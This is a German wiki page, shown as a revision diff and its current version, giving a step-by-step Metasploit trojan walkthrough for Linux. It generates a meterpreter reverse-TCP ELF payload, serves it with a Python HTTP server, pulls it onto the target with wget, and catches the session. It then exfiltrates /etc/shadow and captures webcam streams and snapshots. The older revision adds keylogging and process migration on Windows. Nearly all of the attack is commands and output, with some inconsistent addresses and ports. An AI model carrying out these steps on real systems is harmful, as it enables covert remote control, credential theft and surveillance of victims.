Metasploit trojaner linux: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(30 dazwischenliegende Versionen von 3 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
=Payload erstellen=
+
=Create payload=
*msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.81.1.91 LPORT=4444 -f exe > shell.elf
+
*msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f elf > shell.elf
*cp shell.elf /var/www/html/
+
*chmod +x shell.elf
=Payload auf den Opfer Rechner bringen und ausführen=
+
*python -m http.server 2222
*wget http://10.81.1.91/shell.elf
 
  
=Konsole starten=
+
=get Payload on the target computer an start=
 +
*wget http://10.0.10.101:2222/shell.elf
 +
oder
 +
*scp xinux@10.0.10.101:/var/www/html/shell.elf .
 +
 
 +
=Launch Console=
 
*msfconsole
 
*msfconsole
 
<pre>
 
<pre>
Zeile 21: Zeile 25:
 
*msf > use exploit/multi/handler  
 
*msf > use exploit/multi/handler  
 
*msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
 
*msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
*msf exploit(handler) > set LHOST 10.81.1.91
+
*msf exploit(handler) > set LHOST 10.0.10.101
  LHOST => 10.81.1.91
+
  LHOST => 10.0.10.101
*msf exploit(handler) > set LPORT 6666
+
*msf exploit(handler) > set LPORT 4444
  LPORT => 6666
+
  LPORT => 4444
=Starten des exploits=
+
 
 +
=Start the exploits=
 
*msf exploit(handler) > exploit  
 
*msf exploit(handler) > exploit  
 
  [*] Exploit running as background job 0.  
 
  [*] Exploit running as background job 0.  
  
  [*] Started reverse TCP handler on 10.81.1.91:4444
+
  [*] Started reverse TCP handler on 10.81.1.91:6666
  
=Anzeigen der Sessions=
+
=Viewing the sessions=
 
*msf exploit(handler) > sessions  
 
*msf exploit(handler) > sessions  
<pre>
 
Active sessions
 
===============
 
  
  Id  Type                    Information              Connection
+
=Metapreter File Management=
  --  ----                    -----------              ----------
 
  1  meterpreter x86/windows  shuttle\xinux @ SHUTTLE  10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
 
</pre>
 
=Wechseln in session=
 
 
 
*msf exploit(handler) > sessions -i 1
 
[*] Starting interaction with 1...
 
 
 
=Metapreter Datei Managment=
 
 
==pwd==
 
==pwd==
 
*meterpreter > pwd
 
*meterpreter > pwd
 
==cd==
 
==cd==
 
*meterpreter > cd ..
 
*meterpreter > cd ..
*meterpreter > cd \\Windows\\System32\\drivers\\etc
+
*meterpreter > cd /etc
 +
 
 
==Download==
 
==Download==
*meterpreter > download hosts
+
*meterpreter > download shadow
 +
 
 
==upload==
 
==upload==
*meterpreter > cd \\Users\\xinux
+
*meterpreter > cd /root
*meterpreter > upload hosts
+
*meterpreter > upload /etc/hosts
 +
 
 
=Webcam=
 
=Webcam=
 
==list==
 
==list==
Zeile 75: Zeile 71:
 
  Webcam shot saved to: /root/PDYSnlbK.jpeg
 
  Webcam shot saved to: /root/PDYSnlbK.jpeg
  
=Starten einer Shell=
+
=Starting a Shell (No Shell Prompt)=
 
*meterpreter > shell  
 
*meterpreter > shell  
 
<pre>
 
<pre>
Process 6588 created.
+
Process 14779 created.
Channel 1 created.
+
Channel 5 created.
Microsoft Windows [Version 10.0.14393]
 
(c) 2016 Microsoft Corporation. Alle Rechte vorbehalten.
 
 
</pre>
 
</pre>
*C:\Users\xinux\Downloads>
+
==Examples Shell==
==Beispiele Shell==
+
*ifconfig
*ipconfig
+
*route -n
*route print
+
*netstat -ltpn
*netstat -n
+
 
 
==Quit==
 
==Quit==
 
*STRG+c
 
*STRG+c
=Keylogging=
 
*meterpreter > ps | grep notepad
 
==Prozess identifizieren==
 
<pre>
 
Filtering on 'notepad'
 
  
Process List
 
============
 
 
PID  PPID  Name        Arch  Session  User          Path
 
---  ----  ----        ----  -------  ----          ----
 
7480  4100  notepad.exe  x64  1        shuttle\xinux  C:\Windows\System32\notepad.exe
 
</pre>
 
==In den Prozess migrieren==
 
*meterpreter > migrate 7480
 
[*] Migrating from 5700 to 7480...
 
 
[*] Migration completed successfully.
 
==Scan start==
 
*meterpreter > keyscan_start
 
Starting the keystroke sniffer ...
 
==Scan dump==
 
*meterpreter > keyscan_dump
 
Dumping captured keystrokes...
 
<UMSCHALT>Hallo <UMSCHALT>Xinux <AKUT><W>ie gehts
 
=Snapshot=
 
*meterpreter > screenshot
 
Screenshot saved to: /root/xzMjqsca.jpeg
 
 
=Sysinfo=
 
=Sysinfo=
 
*meterpreter > sysinfo  
 
*meterpreter > sysinfo  
 
<pre>
 
<pre>
Computer       : SHUTTLE
+
Computer     : gustavo.xinux.lan
OS             : Windows 10 (Build 14393).
+
OS           : Ubuntu 16.04 (Linux 4.4.0-97-generic)
Architecture   : x64
+
Architecture : x64
System Language : de_DE
+
Meterpreter : x64/linux
Domain          : XI-PIRMASENS
 
Logged On Users : 5
 
Meterpreter     : x86/windows
 
 
</pre>
 
</pre>
=Kill a Prozess=
+
=Abschluss=
*meterpreter > pkill notepad
+
*quit
Filtering on 'notepad'
 
Killing: 3240
 

Aktuelle Version vom 15. August 2024, 10:20 Uhr

Create payload

  • msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f elf > shell.elf
  • chmod +x shell.elf
  • python -m http.server 2222

get Payload on the target computer an start

oder

  • scp xinux@10.0.10.101:/var/www/html/shell.elf .

Launch Console

  • msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  • msf > use exploit/multi/handler
  • msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
  • msf exploit(handler) > set LHOST 10.0.10.101
LHOST => 10.0.10.101
  • msf exploit(handler) > set LPORT 4444
LPORT => 4444

Start the exploits

  • msf exploit(handler) > exploit
[*] Exploit running as background job 0. 

[*] Started reverse TCP handler on 10.81.1.91:6666

Viewing the sessions

  • msf exploit(handler) > sessions

Metapreter File Management

pwd

  • meterpreter > pwd

cd

  • meterpreter > cd ..
  • meterpreter > cd /etc

Download

  • meterpreter > download shadow

upload

  • meterpreter > cd /root
  • meterpreter > upload /etc/hosts

Webcam

list

  • meterpreter > webcam_list
1: Integrated Camera

Live stream

  • meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: XZLHwhtQ.html
[*] Streaming...

snap

  • meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PDYSnlbK.jpeg

Starting a Shell (No Shell Prompt)

  • meterpreter > shell
Process 14779 created.
Channel 5 created.

Examples Shell

  • ifconfig
  • route -n
  • netstat -ltpn

Quit

  • STRG+c

Sysinfo

  • meterpreter > sysinfo
Computer     : gustavo.xinux.lan
OS           : Ubuntu 16.04 (Linux 4.4.0-97-generic)
Architecture : x64
Meterpreter  : x64/linux

Abschluss

  • quit
Abgerufen von „http://wiki.ixheim.de/index.php?title=Metasploit_trojaner_linux&oldid=55522